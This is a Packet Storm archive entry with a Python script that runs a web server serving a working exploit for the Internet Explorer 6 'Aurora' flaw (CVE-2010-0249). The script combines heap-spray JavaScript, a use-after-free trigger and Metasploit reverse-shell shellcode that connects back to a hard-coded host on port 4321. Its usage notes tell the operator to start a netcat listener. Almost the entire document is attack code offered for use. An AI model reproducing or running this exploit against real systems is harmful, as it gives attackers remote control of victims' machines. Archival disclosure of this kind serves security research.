Internet Explorer 6 Web Server Exploit

2010-01-20T00:00:00
ID PACKETSTORM:85416
Type packetstorm
Reporter syniack
Modified 2010-01-20T00:00:00

Description

                                        
                                            `#  
# Author : Ahmed Obied (ahmed.obied@gmail.com)  
# Modify by: syniack (syniack@hotmail.com)  
# This program acts as a web server that generates an exploit to   
# target a vulnerability (CVE-2010-0249) in Internet Explorer.   
# The exploit was tested using Internet Explorer 6 on Windows XP SP3.   
# The exploit's payload spawns the reverse shell on port 4321.  
#   
# Usage : nc -lvp 4321  
# Usage : python ie_aurora.py [port number]  
#   
  
import sys  
import socket  
  
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler  
  
class RequestHandler(BaseHTTPRequestHandler):  
  
def convert_to_utf16(self, payload):  
enc_payload = ''  
for i in range(0, len(payload), 2):  
num = 0  
for j in range(0, 2):  
num += (ord(payload[i + j]) & 0xff) << (j * 8)  
enc_payload += '%%u%04x' % num  
return enc_payload  
  
def get_payload(self):  
# win32_reverse - EXITFUNC=proess LHOST=192.168.30.5 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com  
payload = '\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x56'  
payload += '\x9f\xdc\xde\x83\xeb\xfc\xe2\xf4\xaa\xf5\x37\x93\xbe\x66\x23\x21'  
payload += '\xa9\xff\x57\xb2\x72\xbb\x57\x9b\x6a\x14\xa0\xdb\x2e\x9e\x33\x55'  
payload += '\x19\x87\x57\x81\x76\x9e\x37\x97\xdd\xab\x57\xdf\xb8\xae\x1c\x47'  
payload += '\xfa\x1b\x1c\xaa\x51\x5e\x16\xd3\x57\x5d\x37\x2a\x6d\xcb\xf8\xf6'  
payload += '\x23\x7a\x57\x81\x72\x9e\x37\xb8\xdd\x93\x97\x55\x09\x83\xdd\x35'  
payload += '\x55\xb3\x57\x57\x3a\xbb\xc0\xbf\x95\xae\x07\xba\xdd\xdc\xec\x55'  
payload += '\x16\x93\x57\xae\x4a\x32\x57\x9e\x5e\xc1\xb4\x50\x18\x91\x30\x8e'  
payload += '\xa9\x49\xba\x8d\x30\xf7\xef\xec\x3e\xe8\xaf\xec\x09\xcb\x23\x0e'  
payload += '\x3e\x54\x31\x22\x6d\xcf\x23\x08\x09\x16\x39\xb8\xd7\x72\xd4\xdc'  
payload += '\x03\xf5\xde\x21\x86\xf7\x05\xd7\xa3\x32\x8b\x21\x80\xcc\x8f\x8d'  
payload += '\x05\xdc\x8f\x9d\x05\x60\x0c\xb6\x96\x37\xc2\xdb\x30\xf7\xcc\x3f'  
payload += '\x30\xcc\x55\x3f\xc3\xf7\x30\x27\xfc\xff\x8b\x21\x80\xf5\xcc\x8f'  
payload += '\x03\x60\x0c\xb8\x3c\xfb\xba\xb6\x35\xf2\xb6\x8e\x0f\xb6\x10\x57'  
payload += '\xb1\xf5\x98\x57\xb4\xae\x1c\x2d\xfc\x0a\x55\x23\xa8\xdd\xf1\x20'  
payload += '\x14\xb3\x51\xa4\x6e\x34\x77\x75\x3e\xed\x22\x6d\x40\x60\xa9\xf6'  
payload += '\xa9\x49\x87\x89\x04\xce\x8d\x8f\x3c\x9e\x8d\x8f\x03\xce\x23\x0e'  
payload += '\x3e\x32\x05\xdb\x98\xcc\x23\x08\x3c\x60\x23\xe9\xa9\x4f\xb4\x39'  
payload += '\x2f\x59\xa5\x21\x23\x9b\x23\x08\xa9\xe8\x20\x21\x86\xf7\x2c\x54'  
payload += '\x52\xc0\x8f\x21\x80\x60\x0c\xde'  
return self.convert_to_utf16(payload)  
  
def get_exploit(self):  
exploit = '''  
<html>  
<head>  
<script>  
  
var obj, event_obj;  
  
function spray_heap()  
{  
var chunk_size, payload, nopsled;  
  
chunk_size = 0x80000;  
payload = unescape("<PAYLOAD>");  
nopsled = unescape("<NOP>");  
while (nopsled.length < chunk_size)  
nopsled += nopsled;  
nopsled_len = chunk_size - (payload.length + 20);   
nopsled = nopsled.substring(0, nopsled_len);  
heap_chunks = new Array();  
for (var i = 0 ; i < 200 ; i++)  
heap_chunks[i] = nopsled + payload;  
}  
  
function initialize()  
{  
obj = new Array();  
event_obj = null;  
for (var i = 0; i < 200 ; i++ )  
obj[i] = document.createElement("COMMENT");  
}  
  
function ev1(evt)  
{  
event_obj = document.createEventObject(evt);  
document.getElementById("sp1").innerHTML = "";  
window.setInterval(ev2, 1);  
}  
  
function ev2()  
{  
var data, tmp;  
  
data = "";  
tmp = unescape("%u0a0a%u0a0a");  
for (var i = 0 ; i < 4 ; i++)  
data += tmp;  
for (i = 0 ; i < obj.length ; i++ ) {  
obj[i].data = data;  
}  
event_obj.srcElement;  
}  
  
function check()  
{  
if (navigator.userAgent.indexOf("MSIE") == -1)  
return false;  
return true;   
}  
  
if (check()) {  
initialize();  
spray_heap();   
}  
else  
window.location = 'about:blank'  
  
</script>  
</head>  
<body>  
<span id="sp1">  
<img src="aurora.gif" onload="ev1(event)">  
</span>   
</body>  
</html>  
'''  
exploit = exploit.replace('<PAYLOAD>', self.get_payload())  
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')  
return exploit   
  
def get_image(self):  
content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'  
content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'  
content += '\x01\x00\x3b'  
return content  
  
def log_request(self, *args, **kwargs):  
pass  
  
def do_GET(self):  
try:  
if self.path == '/':  
print  
print '[-] Incoming connection from %s' % self.client_address[0]  
self.send_response(200)   
self.send_header('Content-Type', 'text/html')  
self.end_headers()  
print '[-] Sending exploit to %s ...' % self.client_address[0]  
self.wfile.write(self.get_exploit())  
print '[-] Exploit sent to %s' % self.client_address[0]  
elif self.path == '/aurora.gif':   
self.send_response(200)  
self.send_header('Content-Type', 'image/gif')  
self.end_headers()  
self.wfile.write(self.get_image())  
except:   
print '[*] Error : an error has occured while serving the HTTP request'  
print '[-] Exiting ...'  
sys.exit(-1)  
  
  
def main():  
if len(sys.argv) != 2:  
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]  
sys.exit(0)  
try:  
port = int(sys.argv[1])  
if port < 1024 or port > 65535:  
raise ValueError  
try:  
serv = HTTPServer(('', port), RequestHandler)  
ip = socket.gethostbyname(socket.gethostname())  
print '[-] Web server is running at http://%s:%d/' % (ip, port)  
try:  
serv.serve_forever()  
except:  
print '[-] Exiting ...'   
except socket.error:  
print '[*] Error : a socket error has occurred'  
sys.exit(-1)   
except ValueError:  
print '[*] Error : an invalid port number was given'  
sys.exit(-1)  
  
if __name__ == '__main__':  
main()  
`